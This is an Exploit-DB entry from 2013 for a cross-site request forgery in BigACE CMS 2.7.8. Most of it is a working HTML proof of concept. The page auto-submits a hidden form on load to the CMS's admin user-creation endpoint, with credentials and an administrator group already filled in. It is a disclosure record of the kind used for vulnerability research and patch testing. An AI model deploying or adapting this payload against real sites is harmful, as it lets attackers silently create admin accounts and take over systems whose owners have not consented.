BigACE 2.7.8 - Cross-Site Request Forgery (Add Admin)

EDB-ID:

27276

CVE:

EDB Verified:

Author:

Yashar shahinzadeh

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2013-08-02

Vulnerable App:

###########################################################################################
# Exploit Title: Bigace CMS CSRF - Adding  an admin account
# Date: 2013 29 July
# Exploit Author: Yashar shahinzadeh
# Credit goes for: ha.cker.ir
# Vendor Homepage: http://www.bigace.de/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected Version : 2.7.8
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir }
###########################################################################################

Summary:
========
1. CSRF - Adding an admin account
 

1. CSRF - Adding an admin account:
==================================

<html>
<body onload="submitForm()">
<form name="myForm" id="myForm"
                action="[Path to Bigace CMS]/index.php?cmd=admin&id=userCreate_tADMIN_len&mode=create" method="post">
                <input type="hidden" name="userName" value="yashar">
                <input type="hidden" name="language" value="en">
                <input type="hidden" name="userGroups[]" value="40">
				<input type="hidden" name="state" value="1">
				<input type="hidden" name="email" value="yashar@yashar.com">
				<input type="hidden" name="passwordnew" value="yashar">
				<input type="hidden" name="passwordcheck" value="yashar">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services